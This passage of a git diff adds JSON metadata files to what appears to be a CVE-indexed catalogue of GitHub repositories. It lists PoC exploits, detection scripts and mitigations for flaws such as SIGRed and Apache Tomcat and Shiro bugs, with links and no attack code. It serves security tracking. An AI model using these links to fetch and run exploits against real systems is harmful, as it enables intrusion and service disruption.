"2020-07-20T06:15:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 279701266, + "name": "Fake_CVE-2020-1350", + "full_name": "zoomerxsec\/Fake_CVE-2020-1350", + "owner": { + "login": "zoomerxsec", + "id": 56858864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56858864?v=4", + "html_url": "https:\/\/github.com\/zoomerxsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zoomerxsec\/Fake_CVE-2020-1350", + "description": "Fake exploit tool, designed to rickroll users attempting to actually exploit.", + "fork": false, + "created_at": "2020-07-14T21:55:57Z", + "updated_at": "2024-08-12T20:03:44Z", + "pushed_at": "2020-07-19T02:29:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 279776271, + "name": "CVE-2020-1350", + "full_name": "T13nn3s\/CVE-2020-1350", + "owner": { + "login": "T13nn3s", + "id": 29333776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29333776?v=4", + "html_url": "https:\/\/github.com\/T13nn3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T13nn3s\/CVE-2020-1350", + "description": "This Powershell Script is checking if your server is vulnerable for the CVE-2020-1350 Remote Code Execution flaw in the Windows DNS Service", + "fork": false, + "created_at": "2020-07-15T05:46:31Z", + "updated_at": "2023-04-01T11:46:35Z", + "pushed_at": "2023-04-01T11:46:03Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 14, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 279778118, + "name": "SIGRed", + "full_name": "corelight\/SIGRed", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/SIGRed", + "description": "Detection of attempts to exploit Microsoft Windows DNS server via CVE-2020-1350 (AKA SIGRed)", + "fork": false, + "created_at": "2020-07-15T05:55:20Z", + "updated_at": "2024-08-12T20:03:45Z", + "pushed_at": "2020-07-20T02:20:43Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 279961698, + "name": "dRMM-CVE-2020-1350-response", + "full_name": "jmaddington\/dRMM-CVE-2020-1350-response", + "owner": { + "login": "jmaddington", + "id": 2353597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2353597?v=4", + "html_url": "https:\/\/github.com\/jmaddington", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jmaddington\/dRMM-CVE-2020-1350-response", + "description": "Windows registry mitigation response to CVE-2020-1350", + "fork": false, + "created_at": "2020-07-15T19:43:39Z", + "updated_at": "2024-08-12T20:03:47Z", + "pushed_at": "2020-07-15T19:59:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 279999285, + "name": "CVE-2020-1350-DoS", + "full_name": "maxpl0it\/CVE-2020-1350-DoS", + "owner": { + "login": "maxpl0it", + "id": 27973683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27973683?v=4", + "html_url": "https:\/\/github.com\/maxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maxpl0it\/CVE-2020-1350-DoS", + "description": "A denial-of-service proof-of-concept for CVE-2020-1350", + "fork": false, + "created_at": "2020-07-15T23:00:00Z", + "updated_at": "2024-08-12T20:03:47Z", + "pushed_at": "2020-07-17T13:07:29Z", + "stargazers_count": 238, + "watchers_count": 238, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 238, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 280207373, + "name": "CVE-2020-1350", + "full_name": "captainGeech42\/CVE-2020-1350", + "owner": { + "login": "captainGeech42", + "id": 4255667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4255667?v=4", + "html_url": "https:\/\/github.com\/captainGeech42", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/captainGeech42\/CVE-2020-1350", + "description": "Denial of Service PoC for CVE-2020-1350 (SIGRed)", + "fork": false, + "created_at": "2020-07-16T16:46:48Z", + "updated_at": "2024-08-12T20:03:49Z", + "pushed_at": "2020-07-16T18:32:04Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 280336928, + "name": "CVE-2020-1350", + "full_name": "connormcgarr\/CVE-2020-1350", + "owner": { + "login": "connormcgarr", + "id": 45445720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45445720?v=4", + "html_url": "https:\/\/github.com\/connormcgarr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/connormcgarr\/CVE-2020-1350", + "description": "CVE-2020-1350 Proof-of-Concept", + "fork": false, + "created_at": "2020-07-17T05:41:19Z", + "updated_at": "2024-11-23T01:56:27Z", + "pushed_at": "2020-07-27T16:20:06Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 280665873, + "name": "CVE-2020-1350", + "full_name": "graph-inc\/CVE-2020-1350", + "owner": { + "login": "graph-inc", + "id": 68469953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68469953?v=4", + "html_url": "https:\/\/github.com\/graph-inc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/graph-inc\/CVE-2020-1350", + "description": "Scanner and Mitigator for CVE 2020-1350", + "fork": false, + "created_at": "2020-07-18T13:49:54Z", + "updated_at": "2024-08-12T20:03:53Z", + "pushed_at": "2020-07-18T14:05:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 280916907, + "name": "CVE-2020-1350", + "full_name": "CVEmaster\/CVE-2020-1350", + "owner": { + "login": "CVEmaster", + "id": 68512490, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68512490?v=4", + "html_url": "https:\/\/github.com\/CVEmaster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CVEmaster\/CVE-2020-1350", + "description": "DNS Vulnerability - CVE-2020-1350", + "fork": false, + "created_at": "2020-07-19T17:32:47Z", + "updated_at": "2024-08-12T20:03:55Z", + "pushed_at": "2020-07-20T14:25:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 281667659, + "name": "cve-2020-1350", + "full_name": "gdwnet\/cve-2020-1350", + "owner": { + "login": "gdwnet", + "id": 19855556, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19855556?v=4", + "html_url": "https:\/\/github.com\/gdwnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gdwnet\/cve-2020-1350", + "description": "A powershell script to deploy the registry mitigation key for CVE-2020-1350", + "fork": false, + "created_at": "2020-07-22T12:11:33Z", + "updated_at": "2024-08-12T20:04:00Z", + "pushed_at": "2020-07-22T12:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 282558950, + "name": "CVE-2020-1350-Fix", + "full_name": "simeononsecurity\/CVE-2020-1350-Fix", + "owner": { + "login": "simeononsecurity", + "id": 4913771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4913771?v=4", + "html_url": "https:\/\/github.com\/simeononsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simeononsecurity\/CVE-2020-1350-Fix", + "description": "A registry-based workaround can be used to help protect an affected Windows server, and it can be implemented without requiring an administrator to restart the server. Because of the volatility of this vulnerability, administrators may have to implement the workaround before they apply the security update in order to enable them to update their systems by using a standard deployment cadence.", + "fork": false, + "created_at": "2020-07-26T02:12:36Z", + "updated_at": "2024-08-12T20:04:07Z", + "pushed_at": "2020-07-26T02:13:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13519.json b/2020/CVE-2020-13519.json new file mode 100644 index 0000000000..9951067bf5 --- /dev/null +++ b/2020/CVE-2020-13519.json @@ -0,0 +1,33 @@ +[ + { + "id": 865195927, + "name": "poc-for-CVE-2020-13519-still-under-construction-", + "full_name": "SpiralBL0CK\/poc-for-CVE-2020-13519-still-under-construction-", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/poc-for-CVE-2020-13519-still-under-construction-", + "description": "poc for CVE-2020-13519(still under construction). needs refining , testing , tunning...", + "fork": false, + "created_at": "2024-09-30T06:28:49Z", + "updated_at": "2024-10-02T08:18:10Z", + "pushed_at": "2024-09-30T06:30:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1362.json b/2020/CVE-2020-1362.json new file mode 100644 index 0000000000..b89d819687 --- /dev/null +++ b/2020/CVE-2020-1362.json @@ -0,0 +1,33 @@ +[ + { + "id": 280358563, + "name": "CVE-2020-1362", + "full_name": "Q4n\/CVE-2020-1362", + "owner": { + "login": "Q4n", + "id": 48317526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48317526?v=4", + "html_url": "https:\/\/github.com\/Q4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Q4n\/CVE-2020-1362", + "description": "writeup of CVE-2020-1362", + "fork": false, + "created_at": "2020-07-17T07:35:05Z", + "updated_at": "2024-11-11T06:23:25Z", + "pushed_at": "2020-07-17T07:54:26Z", + "stargazers_count": 233, + "watchers_count": 233, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 233, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13640.json b/2020/CVE-2020-13640.json new file mode 100644 index 0000000000..eac2bfba90 --- /dev/null +++ b/2020/CVE-2020-13640.json @@ -0,0 +1,33 @@ +[ + { + "id": 277377386, + "name": "CVE-2020-13640", + "full_name": "asterite3\/CVE-2020-13640", + "owner": { + "login": "asterite3", + "id": 5569241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5569241?v=4", + "html_url": "https:\/\/github.com\/asterite3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asterite3\/CVE-2020-13640", + "description": "CVE-2020-13640 - SQL injection in wpDiscuz WordPress plugin <= 5.3.5", + "fork": false, + "created_at": "2020-07-05T20:22:16Z", + "updated_at": "2020-07-29T06:32:34Z", + "pushed_at": "2020-07-05T20:24:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13699.json b/2020/CVE-2020-13699.json new file mode 100644 index 0000000000..6a9cfebe28 --- /dev/null +++ b/2020/CVE-2020-13699.json @@ -0,0 +1,33 @@ +[ + { + "id": 441779302, + "name": "CVE-2020-13699", + "full_name": "Dilshan-Eranda\/CVE-2020-13699", + "owner": { + "login": "Dilshan-Eranda", + "id": 57589896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57589896?v=4", + "html_url": "https:\/\/github.com\/Dilshan-Eranda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dilshan-Eranda\/CVE-2020-13699", + "description": null, + "fork": false, + "created_at": "2021-12-26T00:06:27Z", + "updated_at": "2021-12-26T00:07:11Z", + "pushed_at": "2021-12-26T00:07:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13777.json b/2020/CVE-2020-13777.json new file mode 100644 index 0000000000..39ba819247 --- /dev/null +++ b/2020/CVE-2020-13777.json @@ -0,0 +1,95 @@ +[ + { + "id": 270871313, + "name": "cve-2020-13777", + "full_name": "0xxon\/cve-2020-13777", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/cve-2020-13777", + "description": "Zeek script to detect servers vulnerable to CVE-2020-13777", + "fork": false, + "created_at": "2020-06-09T01:11:10Z", + "updated_at": "2024-07-16T02:25:52Z", + "pushed_at": "2022-02-15T18:43:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 271798069, + "name": "challenge_CVE-2020-13777", + "full_name": "shigeki\/challenge_CVE-2020-13777", + "owner": { + "login": "shigeki", + "id": 782880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/782880?v=4", + "html_url": "https:\/\/github.com\/shigeki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shigeki\/challenge_CVE-2020-13777", + "description": "Challange CVE-2020-13777 ", + "fork": false, + "created_at": "2020-06-12T12:54:00Z", + "updated_at": "2020-06-13T12:31:59Z", + "pushed_at": "2020-06-13T01:49:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 273894733, + "name": "PoC_TLS1_3_CVE-2020-13777", + "full_name": "prprhyt\/PoC_TLS1_3_CVE-2020-13777", + "owner": { + "login": "prprhyt", + "id": 12488638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12488638?v=4", + "html_url": "https:\/\/github.com\/prprhyt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prprhyt\/PoC_TLS1_3_CVE-2020-13777", + "description": null, + "fork": false, + "created_at": "2020-06-21T11:55:40Z", + "updated_at": "2021-12-10T06:02:56Z", + "pushed_at": "2020-10-27T22:42:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13851.json b/2020/CVE-2020-13851.json new file mode 100644 index 0000000000..7f7bb29acd --- /dev/null +++ b/2020/CVE-2020-13851.json @@ -0,0 +1,33 @@ +[ + { + "id": 512928306, + "name": "pandorafms_7.44", + "full_name": "hadrian3689\/pandorafms_7.44", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/pandorafms_7.44", + "description": "CVE-2020-13851 Pandora FMS 7.44", + "fork": false, + "created_at": "2022-07-11T22:42:02Z", + "updated_at": "2023-01-03T01:55:42Z", + "pushed_at": "2022-09-20T15:34:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13884.json b/2020/CVE-2020-13884.json new file mode 100644 index 0000000000..ba549fd1f7 --- /dev/null +++ b/2020/CVE-2020-13884.json @@ -0,0 +1,33 @@ +[ + { + "id": 270340077, + "name": "CVE-2020-13884", + "full_name": "hessandrew\/CVE-2020-13884", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-13884", + "description": "Citrix Workspace app before 1912 for Windows - Privilege Escalation #2", + "fork": false, + "created_at": "2020-06-07T15:00:03Z", + "updated_at": "2020-09-15T22:08:06Z", + "pushed_at": "2020-06-13T18:32:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13885.json b/2020/CVE-2020-13885.json new file mode 100644 index 0000000000..84c88aa7f8 --- /dev/null +++ b/2020/CVE-2020-13885.json @@ -0,0 +1,33 @@ +[ + { + "id": 270336964, + "name": "CVE-2020-13885", + "full_name": "hessandrew\/CVE-2020-13885", + "owner": { + "login": "hessandrew", + "id": 45692132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45692132?v=4", + "html_url": "https:\/\/github.com\/hessandrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hessandrew\/CVE-2020-13885", + "description": "Citrix Workspace app before 1912 for Windows - Privilege Escalation #1", + "fork": false, + "created_at": "2020-06-07T14:49:46Z", + "updated_at": "2021-06-23T09:46:14Z", + "pushed_at": "2020-06-13T18:32:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13886.json b/2020/CVE-2020-13886.json new file mode 100644 index 0000000000..d7a0428175 --- /dev/null +++ b/2020/CVE-2020-13886.json @@ -0,0 +1,33 @@ +[ + { + "id": 270823879, + "name": "CVE-2020-13886", + "full_name": "Ls4ss\/CVE-2020-13886", + "owner": { + "login": "Ls4ss", + "id": 25537761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25537761?v=4", + "html_url": "https:\/\/github.com\/Ls4ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ls4ss\/CVE-2020-13886", + "description": "Exploit CVE-2020-13886 - LFI Intelbras TIP 200 \/ 200 LITE \/ ", + "fork": false, + "created_at": "2020-06-08T20:52:04Z", + "updated_at": "2024-08-12T20:02:25Z", + "pushed_at": "2020-11-12T15:34:26Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13889.json b/2020/CVE-2020-13889.json new file mode 100644 index 0000000000..ff0d61e8b8 --- /dev/null +++ b/2020/CVE-2020-13889.json @@ -0,0 +1,33 @@ +[ + { + "id": 269470325, + "name": "CVE-2020-13889", + "full_name": "gh0st56\/CVE-2020-13889", + "owner": { + "login": "gh0st56", + "id": 40955428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40955428?v=4", + "html_url": "https:\/\/github.com\/gh0st56", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh0st56\/CVE-2020-13889", + "description": "CVE-2020-13889. The admin page of bludit have an XSS in the showAlert() function that dont sanitize user input leading them to execute an malicious code.", + "fork": false, + "created_at": "2020-06-04T21:35:22Z", + "updated_at": "2020-06-09T16:20:23Z", + "pushed_at": "2020-06-09T16:20:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13925.json b/2020/CVE-2020-13925.json new file mode 100644 index 0000000000..2ae63d1e8a --- /dev/null +++ b/2020/CVE-2020-13925.json @@ -0,0 +1,33 @@ +[ + { + "id": 281088072, + "name": "CVE-2020-13925", + "full_name": "bit4woo\/CVE-2020-13925", + "owner": { + "login": "bit4woo", + "id": 8793481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8793481?v=4", + "html_url": "https:\/\/github.com\/bit4woo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bit4woo\/CVE-2020-13925", + "description": null, + "fork": false, + "created_at": "2020-07-20T10:38:14Z", + "updated_at": "2021-10-16T08:56:58Z", + "pushed_at": "2020-07-20T10:56:28Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13933.json b/2020/CVE-2020-13933.json new file mode 100644 index 0000000000..41d7ee6eed --- /dev/null +++ b/2020/CVE-2020-13933.json @@ -0,0 +1,99 @@ +[ + { + "id": 294077686, + "name": "CVE-2020-13933", + "full_name": "EXP-Docs\/CVE-2020-13933", + "owner": { + "login": "EXP-Docs", + "id": 132466462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4", + "html_url": "https:\/\/github.com\/EXP-Docs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2020-13933", + "description": "CVE-2020-13933 靶场: shiro 认证绕过漏洞", + "fork": false, + "created_at": "2020-09-09T10:20:25Z", + "updated_at": "2024-01-13T02:50:05Z", + "pushed_at": "2023-04-09T02:44:24Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-13933", + "learning" + ], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 297823317, + "name": "cve-2020-13933", + "full_name": "0xkami\/cve-2020-13933", + "owner": { + "login": "0xkami", + "id": 19571618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19571618?v=4", + "html_url": "https:\/\/github.com\/0xkami", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkami\/cve-2020-13933", + "description": "cve-2020-13933 apache shiro权限绕过漏洞", + "fork": false, + "created_at": "2020-09-23T01:55:46Z", + "updated_at": "2020-12-14T07:27:56Z", + "pushed_at": "2020-09-23T02:00:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 418858024, + "name": "CVE-2020-13933Project", + "full_name": "KingBangQ\/CVE-2020-13933Project", + "owner": { + "login": "KingBangQ", + "id": 38780033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38780033?v=4", + "html_url": "https:\/\/github.com\/KingBangQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KingBangQ\/CVE-2020-13933Project", + "description": "此项目为复现CVE-2020-13933 shiro漏洞所搭建的简易springboot+shiro项目", + "fork": false, + "created_at": "2021-10-19T09:33:46Z", + "updated_at": "2021-10-19T09:46:11Z", + "pushed_at": "2021-10-19T09:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13935.json b/2020/CVE-2020-13935.json new file mode 100644 index 0000000000..c6a37adea5 --- /dev/null +++ b/2020/CVE-2020-13935.json @@ -0,0 +1,64 @@ +[ + { + "id": 309400991, + "name": "CVE-2020-13935", + "full_name": "RedTeamPentesting\/CVE-2020-13935", + "owner": { + "login": "RedTeamPentesting", + "id": 34096076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34096076?v=4", + "html_url": "https:\/\/github.com\/RedTeamPentesting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedTeamPentesting\/CVE-2020-13935", + "description": "Exploit for WebSocket Vulnerability in Apache Tomcat", + "fork": false, + "created_at": "2020-11-02T14:48:55Z", + "updated_at": "2024-11-01T16:29:14Z", + "pushed_at": "2020-11-02T14:51:48Z", + "stargazers_count": 165, + "watchers_count": 165, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 165, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 499143889, + "name": "CVE-2020-13935", + "full_name": "aabbcc19191\/CVE-2020-13935", + "owner": { + "login": "aabbcc19191", + "id": 98760972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98760972?v=4", + "html_url": "https:\/\/github.com\/aabbcc19191", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aabbcc19191\/CVE-2020-13935", + "description": null, + "fork": false, + "created_at": "2022-06-02T13:21:25Z", + "updated_at": "2022-06-02T13:25:14Z", + "pushed_at": "2022-06-03T22:15:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-13937.json b/2020/CVE-2020-13937.json new file mode 100644 index 0000000000..311efb8bcc --- /dev/null +++ b/2020/CVE-2020-13937.json @@ -0,0 +1,98 @@ +[ + { + "id": 329859295, + "name": "CVE-2020-13937", + "full_name": "yaunsky\/CVE-2020-13937", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/CVE-2020-13937", + "description": "Apache Kylin API未授权访问漏洞;CVE-2020-13937;Apache Kylin漏洞", + "fork": false, + "created_at": "2021-01-15T08:57:09Z", + "updated_at": "2021-10-19T07:11:42Z", + "pushed_at": "2021-01-15T08:59:18Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 331862557, + "name": "CVE-2020-13937", + "full_name": "Al1ex\/CVE-2020-13937", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": 